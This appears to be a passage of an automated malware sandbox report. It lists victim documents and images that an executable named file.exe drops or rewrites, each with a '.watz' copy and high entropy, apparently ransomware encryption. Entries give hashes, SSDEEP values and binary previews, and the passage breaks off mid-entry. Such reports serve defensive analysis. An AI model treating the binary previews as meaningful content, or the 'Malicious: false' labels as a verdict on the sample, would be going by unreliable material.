Preview:	DVWHK.."...n....p.IZ_.b..v.........k.....8......,r...E.`_b.......&...\Ei!Ne..~.K.....xM..}.F.&....D.Ds.4i.x......_..B....x5.u.V;x.....iQ.1.=..[...... .Z...w .cM4..E.d..O.f....>>.....5P.?r.N...........+...Jc.....p.v.1rG^..'._x#.YR......K.(-3............z...l..n....V.@.....%~..W..k.e...v49!c..z..&mQ.?._..j......y..._..g...o.N..p[.y..K..../....O1...!v.,&....8....%. .y@.~."i. # 2.L\A..`..L....k..h....M.<w...w...%..M......5'........n...\,Wd.Y......Z6b.[V.u..t.!C.Ee....d.O...t273...y...2$..[.dP..d.?.fgG.....,#....^...d3.Q.a;..Os..c.^.i..n8..&.5.w.M....k/...>l..B7...W...S2..Q..J5D..^.%.7.R.RJ..ea.Z...\t.WR..W).\...d1...-:.....U.AdU.......ae.=!?..!.8_;.?......h=..5....;.3.>...g........e[..<...\.._.._..O[...r.t.rc4ZD.~.[...@i.b.....H....L./.7_:....>..0...R.....Q.......h.X..._...S......M.f.F...<i.....Faj..K.g';....@fS....<.........]._...M..w...R..{.....e.g..I. X.E..4......[Jw..m...{...I.l..G.z...,.v...Sf...u...U.0.....+..,.qM...9.....

C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8747063402535415
Encrypted:	false
SSDEEP:	24:NjdCeE5uZ5Gb01xhWzKYbgilSRu6Uggm9/IBkrcs82YmmKTzbZf+Iosup2mTFxbD:NjdvZ200KYURZpFIBkrcsZYP8zFGuuU6
MD5:	3A926133FDA55AC790CE256802704BD1
SHA1:	C17472EADC4B21895A984BC45DF2D44FCE0EE34C
SHA-256:	6F79029C0878FD1F6ADC99A98F0E40B6C1CA55097787CC9668EACE11DDDAFF94
SHA-512:	D7B5A3D0C8FDCC09B3FB7F7DE246BA73AA2C51A8412232058358B61E5DD45240C0D8D21458975D706B872ABB3A21656672F547457AF47CD5731C709324429FF2
Malicious:	false
Preview:	HTAGVL^....m....=b..@y~....9Wtsjb....j...+t0.).]..FB.Z.;k......-.'DR......fW3.....(..J.ku'.@VO.....&..N.!.j.i..p..}:J.o..k.2u.s......~.bq.5.........m+L3D....>t.}.......K.</.....Y..a.....q..~..Y.t...J'...;.[)..b@...sS:..Q....'.....rn?...ix...l...t.....".\|=..T.G.W~.u.../.>D..H.[U........0....^.....C...p.S...d.o..A\|.e.C...s..-.e..7..@Z.w.2.y^\|.P.....<^....O....B........_%.l>.%...s"....A.=:M...(.j.8.a.a.a.r.AN..6...o..7.;1...r.O..D......N.`P.0.g.".2}......m.pO...^.V[.r...`..M.\.ii.V.=.-..^.74l.&.-.7..:.....g.c...........sb..f.4(...3V0.v5..}.K '.6.M...j.+.(vJ]...k.. S..&....w.)..../.5.5.K._..g..\.L...A.y...........q.b3...k...2.Pw....B.&...n....{..]....siu.n..H.....@..^v....%~.5...................P.....h>..\|.g......0...:5Du=..........-.T......:...(.\...~pSB..Gt'.r"......;...b..h...1...9.\|.z..A"..8?...E.....P.I........N..5.nY..%...3..R..m.=Z7..2._..w...Z.^....>.h....In.77.?.j.v-...ye.ovs....\|..I.......9.Cw...v...&:}\|."^.....!.

C:\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8747063402535415
Encrypted:	false
SSDEEP:	24:NjdCeE5uZ5Gb01xhWzKYbgilSRu6Uggm9/IBkrcs82YmmKTzbZf+Iosup2mTFxbD:NjdvZ200KYURZpFIBkrcsZYP8zFGuuU6
MD5:	3A926133FDA55AC790CE256802704BD1
SHA1:	C17472EADC4B21895A984BC45DF2D44FCE0EE34C
SHA-256:	6F79029C0878FD1F6ADC99A98F0E40B6C1CA55097787CC9668EACE11DDDAFF94
SHA-512:	D7B5A3D0C8FDCC09B3FB7F7DE246BA73AA2C51A8412232058358B61E5DD45240C0D8D21458975D706B872ABB3A21656672F547457AF47CD5731C709324429FF2
Malicious:	false
Preview:	HTAGVL^....m....=b..@y~....9Wtsjb....j...+t0.).]..FB.Z.;k......-.'DR......fW3.....(..J.ku'.@VO.....&..N.!.j.i..p..}:J.o..k.2u.s......~.bq.5.........m+L3D....>t.}.......K.</.....Y..a.....q..~..Y.t...J'...;.[)..b@...sS:..Q....'.....rn?...ix...l...t.....".\|=..T.G.W~.u.../.>D..H.[U........0....^.....C...p.S...d.o..A\|.e.C...s..-.e..7..@Z.w.2.y^\|.P.....<^....O....B........_%.l>.%...s"....A.=:M...(.j.8.a.a.a.r.AN..6...o..7.;1...r.O..D......N.`P.0.g.".2}......m.pO...^.V[.r...`..M.\.ii.V.=.-..^.74l.&.-.7..:.....g.c...........sb..f.4(...3V0.v5..}.K '.6.M...j.+.(vJ]...k.. S..&....w.)..../.5.5.K._..g..\.L...A.y...........q.b3...k...2.Pw....B.&...n....{..]....siu.n..H.....@..^v....%~.5...................P.....h>..\|.g......0...:5Du=..........-.T......:...(.\...~pSB..Gt'.r"......;...b..h...1...9.\|.z..A"..8?...E.....P.I........N..5.nY..%...3..R..m.=Z7..2._..w...Z.^....>.h....In.77.?.j.v-...ye.ovs....\|..I.......9.Cw...v...&:}\|."^.....!.

C:\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8331925303797245
Encrypted:	false
SSDEEP:	24:3vdD2VbTl9OW4b+moEuKH2zFZWnPgJAmmFNnL6RAKUHVbw8nSIsbD:fdD6N4bx+KHj4Jo36RA/H28fmD
MD5:	D7AE3FADC3F3B14F79DEA0547E9945EA
SHA1:	4FA6C9573711DA2DA6B6D1CA916D96D4A2CFE36B
SHA-256:	3A9BD8F2C8823F3317E4B457B71B2B5ABE90158345A7A740C6E96F6A59FA7A8C
SHA-512:	CAA9315D5693D2F6844D3BA34C81DADB71AFFF6121A9520718431BE97D8BD3F627F0FA76E60FFCC4A03F6FF19257710E9B5B7618A2CF2FEC93300A0722ABFE8B
Malicious:	false
Preview:	KATAX.j...+L...:....\....n_ej.......;...F.~K.5?5m49......hU.....&..]2.Iz.R.......^r.5.#u...?rq.I.jf....+.4%./.:FtK]ir...-j1..._.:0..M...J#"}.=.X..#.#....d......)........:...&.6m..lJJ...5.]..7.r.,);.@....$M2.0..`%....m..WB.......#U.I......<.'c10Zt..}..f.7.u..8ou#e.v...#^..^`.G.....c.7.$......^.5...i..aTU.}.U.MN.....y._A...^fb\|....N....SM...v.n../.g.d.@......2k...u..>...}.....\|.`{9..q.-...0KI..;H+y...1y...!,O^>&.5...U..K..pL.`b:..K4.3.....#:6(5.H.1Ob.._..1..{y....I....8$7...uB....$.6...Y..,c.V......DX.........j.3;nH...<be.@.,Vy..g.?r.`.3$..n.G#....l...J.6+.Q.5G.....Z.H..;).:......U.o.N.%.@.w......{.U..VuZ.7U.6..E.._.X.........39#..c..ha"vI... ......w.f..+ORO...>;.~:q[...a...nK.%c..R.....zM2.f{.'...C...u..b1...m....B...}8.M...DZ/....7#..-#.0.;b.....$.e...}N....v4.....M{.dt.;..N......G.]..m.H.q..\>1K..aI.F`ufj.U.O[.O.2.......1@..a.?........h...g&.vJA(.H.y<n..p.5k.jm.r.(8<}..B.R..=v.CW.g..3&}R}.H'.@.WJv...#...ky.m......y.d4n....z.(.4.

C:\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8331925303797245
Encrypted:	false
SSDEEP:	24:3vdD2VbTl9OW4b+moEuKH2zFZWnPgJAmmFNnL6RAKUHVbw8nSIsbD:fdD6N4bx+KHj4Jo36RA/H28fmD
MD5:	D7AE3FADC3F3B14F79DEA0547E9945EA
SHA1:	4FA6C9573711DA2DA6B6D1CA916D96D4A2CFE36B
SHA-256:	3A9BD8F2C8823F3317E4B457B71B2B5ABE90158345A7A740C6E96F6A59FA7A8C
SHA-512:	CAA9315D5693D2F6844D3BA34C81DADB71AFFF6121A9520718431BE97D8BD3F627F0FA76E60FFCC4A03F6FF19257710E9B5B7618A2CF2FEC93300A0722ABFE8B
Malicious:	false
Preview:	KATAX.j...+L...:....\....n_ej.......;...F.~K.5?5m49......hU.....&..]2.Iz.R.......^r.5.#u...?rq.I.jf....+.4%./.:FtK]ir...-j1..._.:0..M...J#"}.=.X..#.#....d......)........:...&.6m..lJJ...5.]..7.r.,);.@....$M2.0..`%....m..WB.......#U.I......<.'c10Zt..}..f.7.u..8ou#e.v...#^..^`.G.....c.7.$......^.5...i..aTU.}.U.MN.....y._A...^fb\|....N....SM...v.n../.g.d.@......2k...u..>...}.....\|.`{9..q.-...0KI..;H+y...1y...!,O^>&.5...U..K..pL.`b:..K4.3.....#:6(5.H.1Ob.._..1..{y....I....8$7...uB....$.6...Y..,c.V......DX.........j.3;nH...<be.@.,Vy..g.?r.`.3$..n.G#....l...J.6+.Q.5G.....Z.H..;).:......U.o.N.%.@.w......{.U..VuZ.7U.6..E.._.X.........39#..c..ha"vI... ......w.f..+ORO...>;.~:q[...a...nK.%c..R.....zM2.f{.'...C...u..b1...m....B...}8.M...DZ/....7#..-#.0.;b.....$.e...}N....v4.....M{.dt.;..N......G.]..m.H.q..\>1K..aI.F`ufj.U.O[.O.2.......1@..a.?........h...g&.vJA(.H.y<n..p.5k.jm.r.(8<}..B.R..=v.CW.g..3&}R}.H'.@.WJv...#...ky.m......y.d4n....z.(.4.

C:\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848282923098403
Encrypted:	false
SSDEEP:	24:SBqbSc8Kj/apyk6CPhrHfZ2i4vv7eRKsSMMxt8Rg0VNKxtOgIPr3+HqH5ivZ8ubD:Sg2VKj/dePVx2i4vzuKsdStEfaxtOgks
MD5:	E7253C94C4615452FFFE309981791066
SHA1:	AB64972ADE175ED438AB92B49B6E5FE6AC787387
SHA-256:	FD5310088207FADA06CD5A013E5C634049FD5E8725123212D4AE774B5B1882D9
SHA-512:	153494080F19CCC592E43326400AA18A44BE194A15697C9606D1418B0694BF85E7ED0821D23B646ECF7A5D72F448B399AA6F74036B58CB44CB4A6E4D8B4506F2
Malicious:	false
Preview:	ONBQC.(.]. ..O.T.b5....^....T..$\..,...o&RM..3Z.&.#.(.RQ.....Zu!.c....A.'.....CmE.C...m..?.&.A=.&4......a.h_....U_...D...3........N-`........z..x..C...<....... m..67Q[(n.-.L.B.bQ.Q.9.$.......3DN0.-\|S....\.l...........^.=.....G.}...S...q..x.a.g(..{.Ip7...\|..C).I_.!..JIf...~.5.UH.h.........r...K.......b&.Sf..{..I.$....~w.I.x........../%.k.x...}..o).S#...o<%u..a... ...F...+zh.Q.;'.0....t....-&.`N.?...I..........{..P.....,.I..k........+g...7H.9..UVOMw..0[...C..{J....2..rut...[.HZK:.......}$c.lpO<.......t...I....%T..<e\|..#......JC.[T.)...L.\|......(..p.G.b.e[.....?3~C.......=........)...t.+.....5Uu........ko.........8xO..:..LDpH.<!T...d....qf..A..1..Mp..[..J,Q..Z.}o.n<4...Y..Z5.\.c..6K...u.......W}.s<...=?.r.J..F....@.?...%eD.J.K... 8GF\|le....pV.....Z2.^_.Gx........='A...d+..xDL...c7.g..x8...Ij.y.'.6.2.`.....I.......e..cR..u..h.2..G(>..._.!...~..U./..1o.Y..%.U."..B.............~.x.....G\|.y...9A Z.GT.].......\|."\|....K4-.k@S.h'.<.),.?...sf...D

C:\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848282923098403
Encrypted:	false
SSDEEP:	24:SBqbSc8Kj/apyk6CPhrHfZ2i4vv7eRKsSMMxt8Rg0VNKxtOgIPr3+HqH5ivZ8ubD:Sg2VKj/dePVx2i4vzuKsdStEfaxtOgks
MD5:	E7253C94C4615452FFFE309981791066
SHA1:	AB64972ADE175ED438AB92B49B6E5FE6AC787387
SHA-256:	FD5310088207FADA06CD5A013E5C634049FD5E8725123212D4AE774B5B1882D9
SHA-512:	153494080F19CCC592E43326400AA18A44BE194A15697C9606D1418B0694BF85E7ED0821D23B646ECF7A5D72F448B399AA6F74036B58CB44CB4A6E4D8B4506F2
Malicious:	false
Preview:	ONBQC.(.]. ..O.T.b5....^....T..$\..,...o&RM..3Z.&.#.(.RQ.....Zu!.c....A.'.....CmE.C...m..?.&.A=.&4......a.h_....U_...D...3........N-`........z..x..C...<....... m..67Q[(n.-.L.B.bQ.Q.9.$.......3DN0.-\|S....\.l...........^.=.....G.}...S...q..x.a.g(..{.Ip7...\|..C).I_.!..JIf...~.5.UH.h.........r...K.......b&.Sf..{..I.$....~w.I.x........../%.k.x...}..o).S#...o<%u..a... ...F...+zh.Q.;'.0....t....-&.`N.?...I..........{..P.....,.I..k........+g...7H.9..UVOMw..0[...C..{J....2..rut...[.HZK:.......}$c.lpO<.......t...I....%T..<e\|..#......JC.[T.)...L.\|......(..p.G.b.e[.....?3~C.......=........)...t.+.....5Uu........ko.........8xO..:..LDpH.<!T...d....qf..A..1..Mp..[..J,Q..Z.}o.n<4...Y..Z5.\.c..6K...u.......W}.s<...=?.r.J..F....@.?...%eD.J.K... 8GF\|le....pV.....Z2.^_.Gx........='A...d+..xDL...c7.g..x8...Ij.y.'.6.2.`.....I.......e..cR..u..h.2..G(>..._.!...~..U./..1o.Y..%.U."..B.............~.x.....G\|.y...9A Z.GT.].......\|."\|....K4-.k@S.h'.<.),.?...sf...D

C:\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83916390026158
Encrypted:	false
SSDEEP:	24:b3xZZu2WxvZUBCUEe6xDgU8HpRAQWI5W/VqTL/UccOG4YiLfAm1nnbD:b3xZZk6BCBVxDIRxLWdqTL/aOGx81nbD
MD5:	2E8C0446C14FE58BD8C4AAD7E27534CC
SHA1:	F28C47622D497ECF5CF6B72031E123B3BAD6C9C6
SHA-256:	6721F2BEB55AF0CA62173FFFC5D603B18AEED339918AB5EE85FC950CFBFA34D2
SHA-512:	83968E469C4A2222DC853CE880179D83C955CB683379ED0BD8004B030417D05CB6C5D50F38463745F375963082AB1DC1A963ABE6EC6CBBA8C27207DC4D1B89D6
Malicious:	false
Preview:	UMMBD<.....v.....x.....KC.i-a..X$.....N.0D_.W{\|G.........+...5`W...;^.........O......~.r0\|'..#.....!.~..iV.5.m.M.;..Ya;.,7..7#;dtt.%.{Y.3..}....}..-..I.h.....12h!........I..YJ..#`X....a..&.&`9../\|.. \Z.yV..a.s1?..e(..E......@Q...J7]......P.n.J...M.h{.s..K..iF$...5..@...-.Q?x@W./.}:Fp.N.....mh........o.%[......1.PX...V~.ig..rz.&..Dv..\|T.vg.....5..&..D[<Kq.Y.$yPakwM...L. <.H.o....K-e",H.z.V.c%".... .o.T.W..N.>..W..=.:X.(=:d.1.b. ...z..A.......(.....>..1.y.B....4AC..I.L....o..S.h{y5.....g6QP....eQ..F.5.V........;.y.a...x...t.%.._%..i. .A\|<.`"..Z.....N.l.IA.o.{..hUtC!<......m.A9.q.j.'\|,.8.o..U....0R4A.^..?.....X...ZfX}.^.$t.q.....2&.exE..{...~.wA...a..f.E."..J}f...lg+....Q.!.J...S..DAdC.5..(..........g^.r.8.Z..+$x.de,.W...3.c.}B...........?^.g.^..J..:...oW/..f....]h~.......x...Cenh6.Y.N..Q...u.H.{.f..G.~6.>l.VF0o.L.2.%>..Ig.....X4..q..^.".-.<{;..K........#....}..d..d...v.J...d...g..C6."...$=......\|....n.....v...C.{[....x....9.t.-W.......(

C:\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83916390026158
Encrypted:	false
SSDEEP:	24:b3xZZu2WxvZUBCUEe6xDgU8HpRAQWI5W/VqTL/UccOG4YiLfAm1nnbD:b3xZZk6BCBVxDIRxLWdqTL/aOGx81nbD
MD5:	2E8C0446C14FE58BD8C4AAD7E27534CC
SHA1:	F28C47622D497ECF5CF6B72031E123B3BAD6C9C6
SHA-256:	6721F2BEB55AF0CA62173FFFC5D603B18AEED339918AB5EE85FC950CFBFA34D2
SHA-512:	83968E469C4A2222DC853CE880179D83C955CB683379ED0BD8004B030417D05CB6C5D50F38463745F375963082AB1DC1A963ABE6EC6CBBA8C27207DC4D1B89D6
Malicious:	false
Preview:	UMMBD<.....v.....x.....KC.i-a..X$.....N.0D_.W{\|G.........+...5`W...;^.........O......~.r0\|'..#.....!.~..iV.5.m.M.;..Ya;.,7..7#;dtt.%.{Y.3..}....}..-..I.h.....12h!........I..YJ..#`X....a..&.&`9../\|.. \Z.yV..a.s1?..e(..E......@Q...J7]......P.n.J...M.h{.s..K..iF$...5..@...-.Q?x@W./.}:Fp.N.....mh........o.%[......1.PX...V~.ig..rz.&..Dv..\|T.vg.....5..&..D[<Kq.Y.$yPakwM...L. <.H.o....K-e",H.z.V.c%".... .o.T.W..N.>..W..=.:X.(=:d.1.b. ...z..A.......(.....>..1.y.B....4AC..I.L....o..S.h{y5.....g6QP....eQ..F.5.V........;.y.a...x...t.%.._%..i. .A\|<.`"..Z.....N.l.IA.o.{..hUtC!<......m.A9.q.j.'\|,.8.o..U....0R4A.^..?.....X...ZfX}.^.$t.q.....2&.exE..{...~.wA...a..f.E."..J}f...lg+....Q.!.J...S..DAdC.5..(..........g^.r.8.Z..+$x.de,.W...3.c.}B...........?^.g.^..J..:...oW/..f....]h~.......x...Cenh6.Y.N..Q...u.H.{.f..G.~6.>l.VF0o.L.2.%>..Ig.....X4..q..^.".-.<{;..K........#....}..d..d...v.J...d...g..C6."...$=......\|....n.....v...C.{[....x....9.t.-W.......(

C:\Users\user\Desktop\ONBQCLYSPU\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843349893510034
Encrypted:	false
SSDEEP:	24:d8DoOvPZFQqHAeJaO0Uh9zUFaYpfnLdZ9vJtFz87n+Nv08VmMUbD:uEOvPZFQqgeJhUF5DZ9vLW+NcEd+D
MD5:	3F9C4FBC0EBEE667A17761FBBCC9D261
SHA1:	9CF1AE6C6A055CEA259258DCC3AF25C179421194
SHA-256:	EFB5E555D2364830520ABEC0FFD78DE6D257DE1774D3938107B6589D71C3B25A
SHA-512:	424A32A385E3D2EB301D86BA8FBB2F727F177EED30708EBED085C94E51FC1DDFCF11CE4B6DB0295F246170AF08013386216815D415B9B0D00D05412140CF9627
Malicious:	false
Preview:	VLZDGQ..H!V.. .....P..j..{.a.R...1....e...X..s....?\.........)...G.&L.l...l=......a495.. ..zvS.lq..p.%...h1.9(5....Il.[o.8.\..,.....!..#o.P...C.+Y.dVG..W7$.....C..J........."....(2k._...4"+(U..].-O)E.I.m..CM...9?..l......ZS.....3@.k.#..-{...1.I.......W.R.M....7a..<.m......l...'<V.W.....3....5.4...K...`...rV....u....J.W....Bj............:...1......^....c...q...........x.0y.......r..$....c...k....^.;+..&.p$.j..s.....M..I....P..9..n.?.}....'...7S24mi...lA.........+m...\|8....V.....G;U.Rzc.4.../....vr..g..`.p.A6...i.e....?2.{Z...a.V.ii..R..&o.3.+Q.C...v.%LD.k.H.{.....cJ..(.........;......H.s...x...p.y..q.h..}".........h.)^}..b.YM.QE...Nz....v.c.....{..1..[..e.Z..\|..Z......5D.O. .8......B....p"w.l..0...9B.....;..%.\|-W.Q.=.{O..r/."..e.&..N.H..@..lbs.uA.......Z7..G.}..\|.W...J:..>.a.......B...!4q....S6.Ct.u..6.G.A..nw..b)@..2.C...L@.H_.L.......aB...[...B.Yi.s..t.y.@v..4.....Q....q.NwK2.[.]')<6...v2.y..;.*.}.q..RZY.>\|..>..~.=d......./.D.E...)

C:\Users\user\Desktop\ONBQCLYSPU\VLZDGUKUTZ.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843349893510034
Encrypted:	false
SSDEEP:	24:d8DoOvPZFQqHAeJaO0Uh9zUFaYpfnLdZ9vJtFz87n+Nv08VmMUbD:uEOvPZFQqgeJhUF5DZ9vLW+NcEd+D
MD5:	3F9C4FBC0EBEE667A17761FBBCC9D261
SHA1:	9CF1AE6C6A055CEA259258DCC3AF25C179421194
SHA-256:	EFB5E555D2364830520ABEC0FFD78DE6D257DE1774D3938107B6589D71C3B25A
SHA-512:	424A32A385E3D2EB301D86BA8FBB2F727F177EED30708EBED085C94E51FC1DDFCF11CE4B6DB0295F246170AF08013386216815D415B9B0D00D05412140CF9627
Malicious:	false
Preview:	VLZDGQ..H!V.. .....P..j..{.a.R...1....e...X..s....?\.........)...G.&L.l...l=......a495.. ..zvS.lq..p.%...h1.9(5....Il.[o.8.\..,.....!..#o.P...C.+Y.dVG..W7$.....C..J........."....(2k._...4"+(U..].-O)E.I.m..CM...9?..l......ZS.....3@.k.#..-{...1.I.......W.R.M....7a..<.m......l...'<V.W.....3....5.4...K...`...rV....u....J.W....Bj............:...1......^....c...q...........x.0y.......r..$....c...k....^.;+..&.p$.j..s.....M..I....P..9..n.?.}....'...7S24mi...lA.........+m...\|8....V.....G;U.Rzc.4.../....vr..g..`.p.A6...i.e....?2.{Z...a.V.ii..R..&o.3.+Q.C...v.%LD.k.H.{.....cJ..(.........;......H.s...x...p.y..q.h..}".........h.)^}..b.YM.QE...Nz....v.c.....{..1..[..e.Z..\|..Z......5D.O. .8......B....p"w.l..0...9B.....;..%.\|-W.Q.=.{O..r/."..e.&..N.H..@..lbs.uA.......Z7..G.}..\|.W...J:..>.a.......B...!4q....S6.Ct.u..6.G.A..nw..b)@..2.C...L@.H_.L.......aB...[...B.Yi.s..t.y.@v..4.....Q....q.NwK2.[.]')<6...v2.y..;.*.}.q..RZY.>\|..>..~.=d......./.D.E...)

C:\Users\user\Desktop\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864272183300029
Encrypted:	false
SSDEEP:	24:ViiD7oQPcqtkZYGNn7BM1v2Ued2Qh3o19GRKY2NlocSp1oTmUF/nb1jzflbD:1BkPZYGT+vzo26HRKYqSX18F/nJf1D
MD5:	65A104FB668B695DEB181E0C0F85814A
SHA1:	DA4EC86C89C70DB6E53F087504B27E315EE689F2
SHA-256:	4F270CABE60D9027917A4EF0A82A063671166C76A4475DDE8513C60F58F6B06E
SHA-512:	97388D3AF05849755F2AE3B17259353ADF126D5EC0B0568B16B8904C6893263073E62C9EFCB81503FE3637915756BA46D8E5B6FD4381BF89872555E6B2ADDF0E
Malicious:	false
Preview:	UMMBD..V.....wy..zH.....@....PI...Yv[..c.o.L...j.....E...........9+....nt0e........dG....LO.zkk....5E=.`.i.4i.,"Uis..`?.;......=.b^...v(x.....`95...zV..72T.....Z...4...K./....e.!.K.q.\|.h...!,.w..w-..9..(X.<G.t,.AV\.;y.U.....\`...!..u.B....@..q..o.....]Mq7j..6P.=.rJ2..A6..S........."....$O..j......A..[..81..F^q.e.......f.I..n...pF.. ..:M.C?.~.....@4p...D:..v..dr... .M..>n........_0V .U..KRk..G.u_..H9.q/...h...r....i....."JpL.%6.Wt.F.&...I.Wu_K5...zg.)..s....7&..1W....z..@......00d.....;[....J...~.I.....q.0....k.7._...w.W..1 ....\|R.....}.......y"]..v..]_...........3...D....R.^.......k..w-{.3....J...Z.n&..Acj.pC...t.;.2....\|.~..E...#.pg........m.Za....p....1...)w...1..W..[x.y...#I..a........W(.g.Q.P.`[-/HUE.<2..X.1H`...?..8..H.b.c..!.....j..-..4....3WOV..yh.4J.c.b.2o.$.[a..lr....F.(W..!.y.D..}.e.e....\....C./.1~K.i\......=.%..)b4.c...Y.....,F.....z.......,W.Mz._._.0..w..H....os..-X.\|..o.r..(..iVh.'.t.uE.<.K<.K....`.5.....\....n.

C:\Users\user\Desktop\UMMBDNEQBN.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864272183300029
Encrypted:	false
SSDEEP:	24:ViiD7oQPcqtkZYGNn7BM1v2Ued2Qh3o19GRKY2NlocSp1oTmUF/nb1jzflbD:1BkPZYGT+vzo26HRKYqSX18F/nJf1D
MD5:	65A104FB668B695DEB181E0C0F85814A
SHA1:	DA4EC86C89C70DB6E53F087504B27E315EE689F2
SHA-256:	4F270CABE60D9027917A4EF0A82A063671166C76A4475DDE8513C60F58F6B06E
SHA-512:	97388D3AF05849755F2AE3B17259353ADF126D5EC0B0568B16B8904C6893263073E62C9EFCB81503FE3637915756BA46D8E5B6FD4381BF89872555E6B2ADDF0E
Malicious:	false
Preview:	UMMBD..V.....wy..zH.....@....PI...Yv[..c.o.L...j.....E...........9+....nt0e........dG....LO.zkk....5E=.`.i.4i.,"Uis..`?.;......=.b^...v(x.....`95...zV..72T.....Z...4...K./....e.!.K.q.\|.h...!,.w..w-..9..(X.<G.t,.AV\.;y.U.....\`...!..u.B....@..q..o.....]Mq7j..6P.=.rJ2..A6..S........."....$O..j......A..[..81..F^q.e.......f.I..n...pF.. ..:M.C?.~.....@4p...D:..v..dr... .M..>n........_0V .U..KRk..G.u_..H9.q/...h...r....i....."JpL.%6.Wt.F.&...I.Wu_K5...zg.)..s....7&..1W....z..@......00d.....;[....J...~.I.....q.0....k.7._...w.W..1 ....\|R.....}.......y"]..v..]_...........3...D....R.^.......k..w-{.3....J...Z.n&..Acj.pC...t.;.2....\|.~..E...#.pg........m.Za....p....1...)w...1..W..[x.y...#I..a........W(.g.Q.P.`[-/HUE.<2..X.1H`...?..8..H.b.c..!.....j..-..4....3WOV..yh.4J.c.b.2o.$.[a..lr....F.(W..!.y.D..}.e.e....\....C./.1~K.i\......=.%..)b4.c...Y.....,F.....z.......,W.Mz._._.0..w..H....os..-X.\|..o.r..(..iVh.'.t.uE.<.K<.K....`.5.....\....n.

C:\Users\user\Desktop\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854560762954737
Encrypted:	false
SSDEEP:	24:OMMDJgwwlKHQU/nrN3GmSVPVBK0RoqlqWfYQBvkTe6Af/VGbD:OMu7wtU/rN3GmutBKgoqlqYYQBvSe6si
MD5:	5FD07BA4217059115CB0D9ED6B667211
SHA1:	E28B13AFBF34403EEF34D9AFD063EA98C8E5ED39
SHA-256:	E6726FBDADDA9501E4DAC59C531831D60F7468CD4318B65EF7FBD1134C5602D5
SHA-512:	3A9B3B1A516A2DA0137EB1DDEE04C9519E087EAA751EC1CDAC490E530E345E7AD3E62C75AA0CC54C38DB9B1923AAF31A0BADE81CEDCB32E8360840F77BC21DF1
Malicious:	false
Preview:	UMMBDvC).U..7>m../`..F..'.].$.>...g.$.r.$...\...d.Vo..Y.D.h;e}^...DH..g.\..m?...N..[ 9.&2I.j.h.v...........}..=Q:.........Q.-....\|Q...=......]..;.Ic......<..he..+..f..v...........3.&.X_.B.cv@.K.~..9lS.&.X...j.g.t.jd....7r.p.,.i....ES2.7.9bl.;..g.A.....Y>.....+n...-...6.G-}.H.xM.:G...m........N..KHo...S..N.d.C.l.n..6-.oKRA;.K..........b.).ss^/A...m.....q#.,]].s...s0q..v@.^vv.l..?k\|[W.....)..{..Z....~iC..F......L..(0.1w.V.N4......F..ty.}....Zg...yJA..4.^.,v..;Y5B.......)L.&6..w...\|....~:..:.@..m..U...$5./v.$Ps.`..D.j.5&.Z....R...`m.....Z.I<..o.\|2..;o.R.ke..V..>.fL...ZZ;.?.........+yC&m.-....1.B.p..\.._?...9........F7..I.V.LA,z.>..u.YDH.`laG.....'..R.WwG..jv.t....R.p.M.z$a..F.K...[q......+}......p....n.2 ...V....[.P.\|._.\|...6.!.$...2.[.7..\...t......l..k....<q.L....0....R>.9..>6.P....d923V...S.<...DN~..r."8..3.....0V..K{....!.)......E.W.....o...=r..+....A..K.8N`...mF.!X.bc......V.......*..NZ...(.?.E..:>.M.v.)pi:

C:\Users\user\Desktop\UMMBDNEQBN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
